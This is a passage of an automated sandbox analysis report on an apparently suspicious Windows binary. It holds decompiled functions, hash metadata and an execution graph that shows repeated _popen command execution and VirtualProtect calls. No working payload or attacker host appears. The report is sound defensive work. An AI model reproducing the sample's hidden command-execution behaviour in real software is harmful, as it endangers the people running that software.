                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventIconItemLoadMessageSendTextTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2712766465-0
                                                                                                                            • Opcode ID: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                                                                                                            • Instruction ID: e294c04aeed814171d4adbec44afb40f75d5ab8e46fef825956d7cc37fe38289
                                                                                                                            • Opcode Fuzzy Hash: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                                                                                                            • Instruction Fuzzy Hash: D9011A30040B40AFE7215B21DD5ABA6BBA1FB05720F008A2DFAA7959F0C775B852CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004065FE Relevance: 6.3, APIs: 5, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E004065FE(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int* _t21;

				_t21 = _a12;
				_t20 = _a8;
				 *_t21 =  *_t21 & 0x00000000;
				_push(0x10);
				_push(0x41c24c);
				_push(_t20);
				L00418DA0();
				if(_t12 != 0) {
					_push(0x10);
					_push(0x41b390);
					_push(_t20);
					L00418DA0();
					if(_t12 == 0) {
						goto L1;
					}
					_push(0x10);
					_push(0x41b370);
					_push(_t20);
					L00418DA0();
					if(_t12 != 0) {
						_push(0x10);
						_push(0x41b350);
						_push(_t20);
						L00418DA0();
						if(_t12 != 0) {
							_push(0x10);
							_push(0x41b340);
							_push(_t20);
							L00418DA0();
							if(_t12 != 0) {
								return 0x80004002;
							}
							_t13 = _a4;
							_t16 = _t13;
							_t19 = _t13 + 0xc;
							L9:
							asm("sbb ecx, ecx");
							 *_t21 =  ~_t16 & _t19;
							L10:
							 *((intOrPtr*)(_t13 + 0x10)) =  *((intOrPtr*)(_t13 + 0x10)) + 1;
							return 0;
						}
						_t13 = _a4;
						_t16 = _t13;
						_t19 = _t13 + 8;
						goto L9;
					}
					_t13 = _a4;
					_t16 = _t13;
					_t19 = _t13 + 4;
					goto L9;
				}
				L1:
				_t13 = _a4;
				 *_t21 = _t13;
				goto L10;
			}









                                                                                                                            0x00406602
                                                                                                                            0x00406606
                                                                                                                            0x00406609
                                                                                                                            0x0040660c
                                                                                                                            0x0040660e
                                                                                                                            0x00406613
                                                                                                                            0x00406614
                                                                                                                            0x0040661e
                                                                                                                            0x00406627
                                                                                                                            0x00406629
                                                                                                                            0x0040662e
                                                                                                                            0x0040662f
                                                                                                                            0x00406639
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040663b
                                                                                                                            0x0040663d
                                                                                                                            0x00406642
                                                                                                                            0x00406643
                                                                                                                            0x0040664d
                                                                                                                            0x00406659
                                                                                                                            0x0040665b
                                                                                                                            0x00406660
                                                                                                                            0x00406661
                                                                                                                            0x0040666b
                                                                                                                            0x00406677
                                                                                                                            0x00406679
                                                                                                                            0x0040667e
                                                                                                                            0x0040667f
                                                                                                                            0x00406689
                                                                                                                            0x00000000
                                                                                                                            0x004066a2
                                                                                                                            0x0040668b
                                                                                                                            0x0040668e
                                                                                                                            0x00406690
                                                                                                                            0x00406693
                                                                                                                            0x00406695
                                                                                                                            0x00406699
                                                                                                                            0x0040669b
                                                                                                                            0x0040669b
                                                                                                                            0x00000000
                                                                                                                            0x0040669e
                                                                                                                            0x0040666d
                                                                                                                            0x00406670
                                                                                                                            0x00406672
                                                                                                                            0x00000000
                                                                                                                            0x00406672
                                                                                                                            0x0040664f
                                                                                                                            0x00406652
                                                                                                                            0x00406654
                                                                                                                            0x00000000
                                                                                                                            0x00406654
                                                                                                                            0x00406620
                                                                                                                            0x00406620
                                                                                                                            0x00406623
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1475443563-0
                                                                                                                            • Opcode ID: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                                                                                                            • Instruction ID: a37c9b6fd46fbe13aac1983c9063a21cde19e2a8279128ea102ca4b182acfc17
                                                                                                                            • Opcode Fuzzy Hash: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                                                                                                            • Instruction Fuzzy Hash: 9411E931740304A7D7104F15EC02FEA73A89B94714F15483EFC4ABA3C2E67AF9A0969D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404C6F Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00404C6F(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v604;
				intOrPtr _t8;
				intOrPtr* _t15;

				_t15 = __ecx;
				if(E00404B27(__ecx) == 0) {
					L6:
					return 0;
				}
				if( *0x41f16c != 0) {
					SetLastError(0);
					_t8 =  *0x41f16c(_a4, 0,  &_v604, 0);
					 *_t15 = _t8;
					if(_t8 != 0xffffffff || GetLastError() != 0x26) {
						if( *_t15 != 0xffffffff) {
							E00404CE3( &_v604, _a8);
							return 1;
						}
					}
					goto L6;
				}
				SetLastError(0x78);
				goto L6;
			}






                                                                                                                            0x00404c79
                                                                                                                            0x00404c82
                                                                                                                            0x00404cca
                                                                                                                            0x00000000
                                                                                                                            0x00404cca
                                                                                                                            0x00404c8b
                                                                                                                            0x00404c99
                                                                                                                            0x00404cad
                                                                                                                            0x00404cb6
                                                                                                                            0x00404cb8
                                                                                                                            0x00404cc8
                                                                                                                            0x00404cd7
                                                                                                                            0x00000000
                                                                                                                            0x00404cdc
                                                                                                                            0x00404cc8
                                                                                                                            0x00000000
                                                                                                                            0x00404cb8
                                                                                                                            0x00404c8f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                                                                                                            • SetLastError.KERNEL32(00000078), ref: 00404C8F
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00404C99
                                                                                                                            • FindFirstStreamW.KERNELBASE(?,00000000,?,00000000), ref: 00404CAD
                                                                                                                            • GetLastError.KERNEL32 ref: 00404CBA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4071060300-0
                                                                                                                            • Opcode ID: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                                                                                                            • Instruction ID: e0df3afe617d72e22a27f99f1303fe5809e056bbf20cba425ebf9683b02a63d2
                                                                                                                            • Opcode Fuzzy Hash: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                                                                                                            • Instruction Fuzzy Hash: 05F0F970405605E7EB202F20DC0D79637249B91326F104336E665B72E0C7B89D8ACB5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409970 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E00409970(void* __ecx, void* __eflags) {
				intOrPtr* _t106;
				intOrPtr* _t110;
				signed int _t111;
				intOrPtr* _t114;
				signed int _t115;
				intOrPtr* _t118;
				signed int _t119;
				intOrPtr* _t121;
				signed int _t122;
				signed int _t126;
				signed int _t129;
				char* _t130;
				char* _t133;
				void* _t138;
				intOrPtr _t141;
				intOrPtr _t161;
				void* _t175;
				void* _t176;
				signed int _t180;
				void* _t181;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t190;

				E00418D80(E00419D58, _t190);
				_t188 = __ecx;
				_t106 = __ecx + 0xb0;
				_t182 = __ecx + 0xa8;
				 *((char*)(__ecx + 0xb8)) = 0;
				 *_t106 = 0;
				 *((intOrPtr*)(_t106 + 4)) = 0;
				 *_t182 = 0;
				 *((intOrPtr*)(_t182 + 4)) = 0;
				asm("sbb ecx, [ebp+0x10]");
				 *((intOrPtr*)(__ecx + 0xc8)) =  *((intOrPtr*)(__ecx + 0xc0)) -  *((intOrPtr*)(_t190 + 0xc));
				 *((intOrPtr*)(__ecx + 0xcc)) =  *((intOrPtr*)(__ecx + 0xc4));
				E00409944(__ecx + 0x10);
				 *(_t190 - 0x24) = 0;
				 *((short*)(_t190 - 0x22)) = 0;
				 *(_t190 - 0x1c) = 0;
				_t110 =  *((intOrPtr*)(_t190 + 8));
				 *(_t190 - 4) = 0;
				_t111 =  *((intOrPtr*)( *_t110 + 0x20))(_t110, 0x47, _t190 - 0x24, _t181, _t187, _t138);
				 *(_t190 - 0x10) = _t111;
				if(_t111 == 0) {
					 *((intOrPtr*)(__ecx + 0x14)) = E00409903(_t190 - 0x24, __ecx + 0x13);
					E00405DEF(_t190 - 0x24);
					 *(_t190 - 0x24) = 0;
					 *((short*)(_t190 - 0x22)) = 0;
					 *(_t190 - 0x1c) = 0;
					_t114 =  *((intOrPtr*)(_t190 + 8));
					 *(_t190 - 4) = 1;
					_t115 =  *((intOrPtr*)( *_t114 + 0x20))(_t114, 0x48, _t190 - 0x24);
					__eflags = _t115;
					 *(_t190 - 0x10) = _t115;
					if(_t115 == 0) {
						 *((intOrPtr*)(__ecx + 0x18)) = E00409903(_t190 - 0x24, 0);
						E00405DEF(_t190 - 0x24);
						 *(_t190 - 0x24) = 0;
						 *((short*)(_t190 - 0x22)) = 0;
						 *(_t190 - 0x1c) = 0;
						_t118 =  *((intOrPtr*)(_t190 + 8));
						 *(_t190 - 4) = 2;
						_t119 =  *((intOrPtr*)( *_t118 + 0x20))(_t118, 0x37, _t190 - 0x24);
						__eflags = _t119;
						 *(_t190 - 0x10) = _t119;
						if(_t119 == 0) {
							__eflags =  *(_t190 - 0x24);
							if( *(_t190 - 0x24) != 0) {
								__eflags =  *(_t190 - 0x24) - 8;
								_t133 =  *(_t190 - 0x1c);
								if( *(_t190 - 0x24) != 8) {
									_t133 = L"Unknown error";
								}
								E0040376E(_t188 + 0x28, _t133);
							}
							E00405DEF(_t190 - 0x24);
							 *(_t190 - 0x24) = 0;
							 *((short*)(_t190 - 0x22)) = 0;
							 *(_t190 - 0x1c) = 0;
							_t121 =  *((intOrPtr*)(_t190 + 8));
							 *(_t190 - 4) = 3;
							_t122 =  *((intOrPtr*)( *_t121 + 0x20))(_t121, 0x49, _t190 - 0x24);
							__eflags = _t122;
							 *(_t190 - 0x10) = _t122;
							if(_t122 == 0) {
								__eflags =  *(_t190 - 0x24);
								if( *(_t190 - 0x24) != 0) {
									__eflags =  *(_t190 - 0x24) - 8;
									_t130 =  *(_t190 - 0x1c);
									if( *(_t190 - 0x24) != 8) {
										_t130 = L"Unknown warning";
									}
									E0040376E(_t188 + 0x34, _t130);
								}
								 *(_t190 - 4) =  *(_t190 - 4) | 0xffffffff;
								E00405DEF(_t190 - 0x24);
								__eflags =  *(_t190 + 0x14);
								if( *(_t190 + 0x14) == 0) {
									L19:
									_push(_t188 + 0xb8);
									_push(_t188 + 0xb0);
									_t175 = 0x2c;
									_t126 = E00409C0D( *((intOrPtr*)(_t190 + 8)), _t175);
									__eflags = _t126;
									if(_t126 == 0) {
										_push(_t190 + 0x17);
										_push(_t182);
										_t176 = 0x24;
										_t126 = E00409CAB( *((intOrPtr*)(_t190 + 8)), _t176);
										__eflags = _t126;
										if(_t126 == 0) {
											asm("adc eax, [edi+0x4]");
											 *((intOrPtr*)(_t190 + 0xc)) =  *((intOrPtr*)(_t190 + 0xc)) +  *_t182;
											_t161 =  *((intOrPtr*)(_t188 + 0xc0));
											_t129 =  *(_t188 + 0xc4);
											asm("sbb edi, [ebp+0x10]");
											__eflags =  *(_t188 + 0xb8);
											 *((intOrPtr*)(_t188 + 0xc8)) = _t161 -  *((intOrPtr*)(_t190 + 0xc));
											 *(_t188 + 0xcc) = _t129;
											if( *(_t188 + 0xb8) != 0) {
												_t141 =  *((intOrPtr*)(_t188 + 0xb0));
												_t180 =  *(_t188 + 0xb4);
												_t186 = _t141 +  *((intOrPtr*)(_t190 + 0xc));
												 *(_t190 - 0x10) = _t180;
												asm("adc edx, [ebp+0x10]");
												__eflags = _t180 - _t129;
												if(__eflags > 0) {
													L29:
													 *((char*)(_t188 + 0x11)) = 1;
												} else {
													if(__eflags < 0) {
														L25:
														 *((intOrPtr*)(_t188 + 0xc8)) = _t141;
														 *((intOrPtr*)(_t188 + 0x20)) = _t161 - _t186;
														asm("sbb eax, edx");
														 *(_t188 + 0xcc) =  *(_t190 - 0x10);
														 *((char*)(_t188 + 0x10)) = 1;
														 *(_t188 + 0x24) = _t129;
													} else {
														__eflags = _t186 - _t161;
														if(_t186 >= _t161) {
															__eflags = _t180 - _t129;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	goto L29;
																} else {
																	__eflags = _t186 - _t161;
																	if(_t186 > _t161) {
																		goto L29;
																	}
																}
															}
														} else {
															goto L25;
														}
													}
												}
											}
											goto L30;
										}
									}
								} else {
									__eflags =  *(_t188 + 0x13);
									if( *(_t188 + 0x13) == 0) {
										L30:
										_t126 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t188 + 0x14) & 0x00000001;
										if(( *(_t188 + 0x14) & 0x00000001) != 0) {
											goto L30;
										} else {
											goto L19;
										}
									}
								}
							} else {
								E00405DEF(_t190 - 0x24);
								_t126 =  *(_t190 - 0x10);
							}
						} else {
							E00405DEF(_t190 - 0x24);
							_t126 =  *(_t190 - 0x10);
						}
					} else {
						E00405DEF(_t190 - 0x24);
						_t126 =  *(_t190 - 0x10);
					}
				} else {
					E00405DEF(_t190 - 0x24);
					_t126 =  *(_t190 - 0x10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t190 - 0xc));
				return _t126;
			}




























                                                                                                                            0x00409975
                                                                                                                            0x0040997f
                                                                                                                            0x00409984
                                                                                                                            0x00409990
                                                                                                                            0x00409996
                                                                                                                            0x0040999c
                                                                                                                            0x0040999e
                                                                                                                            0x004099a7
                                                                                                                            0x004099ac
                                                                                                                            0x004099af
                                                                                                                            0x004099b2
                                                                                                                            0x004099b8
                                                                                                                            0x004099c1
                                                                                                                            0x004099c6
                                                                                                                            0x004099ca
                                                                                                                            0x004099ce
                                                                                                                            0x004099d1
                                                                                                                            0x004099dd
                                                                                                                            0x004099e0
                                                                                                                            0x004099e5
                                                                                                                            0x004099e8
                                                                                                                            0x00409a08
                                                                                                                            0x00409a0b
                                                                                                                            0x00409a10
                                                                                                                            0x00409a14
                                                                                                                            0x00409a18
                                                                                                                            0x00409a1b
                                                                                                                            0x00409a27
                                                                                                                            0x00409a2e
                                                                                                                            0x00409a31
                                                                                                                            0x00409a33
                                                                                                                            0x00409a36
                                                                                                                            0x00409a55
                                                                                                                            0x00409a58
                                                                                                                            0x00409a5d
                                                                                                                            0x00409a61
                                                                                                                            0x00409a65
                                                                                                                            0x00409a68
                                                                                                                            0x00409a74
                                                                                                                            0x00409a7b
                                                                                                                            0x00409a7e
                                                                                                                            0x00409a80
                                                                                                                            0x00409a83
                                                                                                                            0x00409a95
                                                                                                                            0x00409a99
                                                                                                                            0x00409a9b
                                                                                                                            0x00409aa0
                                                                                                                            0x00409aa3
                                                                                                                            0x00409aa5
                                                                                                                            0x00409aa5
                                                                                                                            0x00409aae
                                                                                                                            0x00409aae
                                                                                                                            0x00409ab6
                                                                                                                            0x00409abb
                                                                                                                            0x00409abf
                                                                                                                            0x00409ac3
                                                                                                                            0x00409ac6
                                                                                                                            0x00409ad2
                                                                                                                            0x00409ad9
                                                                                                                            0x00409adc
                                                                                                                            0x00409ade
                                                                                                                            0x00409ae1
                                                                                                                            0x00409af3
                                                                                                                            0x00409af7
                                                                                                                            0x00409af9
                                                                                                                            0x00409afe
                                                                                                                            0x00409b01
                                                                                                                            0x00409b03
                                                                                                                            0x00409b03
                                                                                                                            0x00409b0c
                                                                                                                            0x00409b0c
                                                                                                                            0x00409b11
                                                                                                                            0x00409b18
                                                                                                                            0x00409b1d
                                                                                                                            0x00409b20
                                                                                                                            0x00409b35
                                                                                                                            0x00409b3e
                                                                                                                            0x00409b45
                                                                                                                            0x00409b48
                                                                                                                            0x00409b49
                                                                                                                            0x00409b4e
                                                                                                                            0x00409b50
                                                                                                                            0x00409b5c
                                                                                                                            0x00409b5d
                                                                                                                            0x00409b60
                                                                                                                            0x00409b61
                                                                                                                            0x00409b66
                                                                                                                            0x00409b68
                                                                                                                            0x00409b76
                                                                                                                            0x00409b79
                                                                                                                            0x00409b7c
                                                                                                                            0x00409b85
                                                                                                                            0x00409b92
                                                                                                                            0x00409b95
                                                                                                                            0x00409b9b
                                                                                                                            0x00409ba1
                                                                                                                            0x00409ba7
                                                                                                                            0x00409ba9
                                                                                                                            0x00409bb7
                                                                                                                            0x00409bba
                                                                                                                            0x00409bbd
                                                                                                                            0x00409bc0
                                                                                                                            0x00409bc3
                                                                                                                            0x00409bc5
                                                                                                                            0x00409bf6
                                                                                                                            0x00409bf6
                                                                                                                            0x00409bc7
                                                                                                                            0x00409bc7
                                                                                                                            0x00409bcd
                                                                                                                            0x00409bcf
                                                                                                                            0x00409bd8
                                                                                                                            0x00409bdb
                                                                                                                            0x00409bdd
                                                                                                                            0x00409be3
                                                                                                                            0x00409be7
                                                                                                                            0x00409bc9
                                                                                                                            0x00409bc9
                                                                                                                            0x00409bcb
                                                                                                                            0x00409bec
                                                                                                                            0x00409bee
                                                                                                                            0x00409bf0
                                                                                                                            0x00000000
                                                                                                                            0x00409bf2
                                                                                                                            0x00409bf2
                                                                                                                            0x00409bf4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409bf4
                                                                                                                            0x00409bf0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409bcb
                                                                                                                            0x00409bc7
                                                                                                                            0x00409bc5
                                                                                                                            0x00000000
                                                                                                                            0x00409ba7
                                                                                                                            0x00409b68
                                                                                                                            0x00409b22
                                                                                                                            0x00409b22
                                                                                                                            0x00409b25
                                                                                                                            0x00409bfa
                                                                                                                            0x00409bfa
                                                                                                                            0x00409bfa
                                                                                                                            0x00409b2b
                                                                                                                            0x00409b2b
                                                                                                                            0x00409b2f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409b2f
                                                                                                                            0x00409b25
                                                                                                                            0x00409ae3
                                                                                                                            0x00409ae6
                                                                                                                            0x00409aeb
                                                                                                                            0x00409aeb
                                                                                                                            0x00409a85
                                                                                                                            0x00409a88
                                                                                                                            0x00409a8d
                                                                                                                            0x00409a8d
                                                                                                                            0x00409a38
                                                                                                                            0x00409a3b
                                                                                                                            0x00409a40
                                                                                                                            0x00409a40
                                                                                                                            0x004099ea
                                                                                                                            0x004099ed
                                                                                                                            0x004099f2
                                                                                                                            0x004099f2
                                                                                                                            0x00409c02
                                                                                                                            0x00409c0a

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID: Unknown error$Unknown warning
                                                                                                                            • API String ID: 3519838083-4291957651
                                                                                                                            • Opcode ID: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                                                                                                            • Instruction ID: 8ba015e8ed9162120bf5fc528179e89f7f943c1107267e4dc13521d9f15a9599
                                                                                                                            • Opcode Fuzzy Hash: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                                                                                                            • Instruction Fuzzy Hash: DB915B71900209DBCB24DFA9C990AEEB7F1FF48304F10856EE45AA7291D734AE49CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:0.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:11.8%
                                                                                                                            Total number of Nodes:254
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 97896 4013c9 97897 4013d0 97896->97897 97898 4013e3 _amsg_exit 97897->97898 97899 4011c5 97897->97899 97902 4013fd _initterm 97898->97902 97906 4011ea 97898->97906 97900 401441 _initterm 97899->97900 97901 4011d2 97899->97901 97903 401464 97900->97903 97901->97902 97901->97906 97902->97906 97905 40146c exit 97903->97905 98087 40c500 97905->98087 97924 40c990 97906->97924 97908 40123d 97911 401242 __p__acmdln 97908->97911 97910 401492 97912 401259 malloc 97911->97912 97912->97903 97914 4012f8 97912->97914 97915 401310 strlen malloc memcpy 97914->97915 97915->97915 97916 401346 97915->97916 97953 40c4c0 97916->97953 97918 40135f 97958 401637 97918->97958 97920 40138b 97920->97905 97921 40139e 97920->97921 97922 4013b2 97921->97922 97923 4013a8 _cexit 97921->97923 97923->97922 97927 40c9b0 97924->97927 97951 40121c SetUnhandledExceptionFilter 97924->97951 97925 40ca0f 97931 40ca1c 97925->97931 97925->97951 97926 40cc00 98093 498680 6 API calls 97926->98093 97927->97925 97927->97926 97928 40caf4 97927->97928 97941 40ca6b 97927->97941 97927->97951 97928->97927 97949 40c840 18 API calls 97928->97949 98092 498680 6 API calls 97928->98092 97933 40ca68 97931->97933 98091 40c840 18 API calls 97931->98091 97933->97941 97950 40ca94 VirtualProtect 97941->97950 97941->97951 97949->97928 97950->97941 97951->97908 97954 40c4c9 97953->97954 97955 40c470 97953->97955 97954->97918 98094 4014c0 _onexit 97955->98094 97957 40c49b 97957->97918 97959 40c4c0 _onexit 97958->97959 97960 401651 FindWindowA 97959->97960 97961 40167c getenv 97960->97961 97962 40169b 97961->97962 98095 485230 97962->98095 97964 4016b8 97965 40172f _popen 97964->97965 97966 401751 97965->97966 97967 485230 83 API calls 97966->97967 97968 40176f 97967->97968 97969 485230 83 API calls 97968->97969 97970 4017aa 97969->97970 97971 485230 83 API calls 97970->97971 97972 4017e5 97971->97972 97973 485230 83 API calls 97972->97973 97974 401820 97973->97974 97975 485230 83 API calls 97974->97975 97976 40185b 97975->97976 97977 485230 83 API calls 97976->97977 97978 401896 97977->97978 97979 485230 83 API calls 97978->97979 97980 4018d1 97979->97980 97981 485230 83 API calls 97980->97981 97982 40190c 97981->97982 97983 485230 83 API calls 97982->97983 97984 401947 97983->97984 97985 485230 83 API calls 97984->97985 97986 401982 97985->97986 97987 485230 83 API calls 97986->97987 97988 4019bd 97987->97988 97989 485230 83 API calls 97988->97989 97990 4019f8 97989->97990 97991 485230 83 API calls 97990->97991 97992 401a33 97991->97992 97993 485230 83 API calls 97992->97993 97994 401a6e 97993->97994 97995 485230 83 API calls 97994->97995 97996 401aa9 97995->97996 97997 485230 83 API calls 97996->97997 97998 401ae4 97997->97998 97999 485230 83 API calls 97998->97999 98000 401b1f 97999->98000 98001 485230 83 API calls 98000->98001 98002 401b5a 98001->98002 98003 485230 83 API calls 98002->98003 98004 401b95 98003->98004 98005 485230 83 API calls 98004->98005 98006 401bd0 98005->98006 98007 485230 83 API calls 98006->98007 98008 401c0b 98007->98008 98009 485230 83 API calls 98008->98009 98010 401c46 98009->98010 98011 485230 83 API calls 98010->98011 98012 401c81 98011->98012 98013 485230 83 API calls 98012->98013 98014 401cbc 98013->98014 98100 4940a0 98014->98100 98016 401cee 98017 401cfb _popen 98016->98017 98018 401d1d 98017->98018 98105 4015c0 98018->98105 98021 4940a0 86 API calls 98022 401d65 98021->98022 98023 401d72 _popen 98022->98023 98024 401d94 98023->98024 98025 4015c0 149 API calls 98024->98025 98026 401da9 98025->98026 98027 4940a0 86 API calls 98026->98027 98028 401ddc 98027->98028 98029 401de9 _popen 98028->98029 98030 401e0b 98029->98030 98031 4015c0 149 API calls 98030->98031 98032 401e20 98031->98032 98033 4940a0 86 API calls 98032->98033 98034 401e53 98033->98034 98035 401e60 _popen 98034->98035 98036 401e82 98035->98036 98037 4015c0 149 API calls 98036->98037 98038 401e97 98037->98038 98039 4940a0 86 API calls 98038->98039 98040 401eca 98039->98040 98041 401ed7 _popen 98040->98041 98042 401ef9 98041->98042 98043 4015c0 149 API calls 98042->98043 98044 401f0e 98043->98044 98045 4940a0 86 API calls 98044->98045 98046 401f41 98045->98046 98047 401f4e _popen 98046->98047 98048 401f70 98047->98048 98049 4015c0 149 API calls 98048->98049 98050 401f85 98049->98050 98051 4940a0 86 API calls 98050->98051 98052 401fb8 98051->98052 98053 401fc5 _popen 98052->98053 98054 401fe7 98053->98054 98055 4015c0 149 API calls 98054->98055 98056 401ffc 98055->98056 98057 4940a0 86 API calls 98056->98057 98058 40202f 98057->98058 98059 40203c _popen 98058->98059 98060 40205e 98059->98060 98061 4015c0 149 API calls 98060->98061 98062 402073 98061->98062 98063 4940a0 86 API calls 98062->98063 98064 4020a6 98063->98064 98065 4020b3 _popen 98064->98065 98066 4020d5 98065->98066 98067 4015c0 149 API calls 98066->98067 98068 4020ea 98067->98068 98069 4940a0 86 API calls 98068->98069 98070 40211d 98069->98070 98071 40212a _popen 98070->98071 98072 40214c 98071->98072 98073 4015c0 149 API calls 98072->98073 98074 402161 98073->98074 98075 4940a0 86 API calls 98074->98075 98076 402191 98075->98076 98077 40219b _popen 98076->98077 98078 4021ba 98077->98078 98079 4015c0 149 API calls 98078->98079 98080 4021cf 98079->98080 98081 4940a0 86 API calls 98080->98081 98082 4021ff 98081->98082 98083 402209 _popen 98082->98083 98084 402228 98083->98084 98085 4015c0 149 API calls 98084->98085 98086 40223d 98085->98086 98086->97920 98088 40c532 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 98087->98088 98089 40c523 98087->98089 98090 40c589 98088->98090 98089->97910 98090->97910 98091->97931 98094->97957 98096 485249 strlen 98095->98096 98097 485253 98095->98097 98096->98097 98110 483340 98097->98110 98099 485266 98099->97964 98122 4852c0 98100->98122 98148 474950 98105->98148 98107 4015e5 98164 475080 98107->98164 98109 401615 98109->98021 98111 48335c 98110->98111 98112 483354 98110->98112 98114 483367 98111->98114 98120 484ee0 81 API calls 98111->98120 98112->98111 98113 4833ec 98112->98113 98121 491190 81 API calls 98113->98121 98115 48336e 98114->98115 98119 4833c6 memcpy 98114->98119 98115->98099 98119->98099 98120->98114 98128 483400 98122->98128 98124 4852e5 98125 483b80 98124->98125 98140 484d90 98125->98140 98129 48341c 98128->98129 98130 483414 98128->98130 98135 483427 98129->98135 98138 484ee0 81 API calls 98129->98138 98130->98129 98131 4834ac 98130->98131 98139 491190 81 API calls 98131->98139 98134 48342e 98134->98124 98135->98134 98137 483486 memcpy 98135->98137 98137->98124 98138->98135 98141 484dab 98140->98141 98142 484db2 98141->98142 98143 484de5 98141->98143 98144 483b98 98142->98144 98146 484dbd memcpy 98142->98146 98147 484f60 84 API calls 98143->98147 98144->98016 98146->98144 98147->98144 98149 474965 98148->98149 98167 48eb20 145 API calls 98149->98167 98151 4749c2 98168 46b360 145 API calls 98151->98168 98153 